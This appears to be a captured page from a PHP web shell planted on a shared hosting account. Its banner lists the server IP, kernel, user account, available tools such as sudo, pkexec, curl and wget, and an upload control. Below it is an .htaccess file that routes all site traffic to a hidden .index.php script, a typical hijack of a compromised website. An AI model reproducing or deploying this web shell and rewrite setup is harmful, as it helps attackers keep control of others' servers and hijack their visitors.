| Server IP : 162.241.203.36 / Your IP : 216.73.216.67 Web Server : Apache System : Linux br982.hostgator.com.br 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64 User : jacks188 ( 6490) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home4/jacks188/public_html/ |
Upload File : |
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
DirectoryIndex .index.php
RewriteRule ^.index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /.index.php [L]
</IfModule>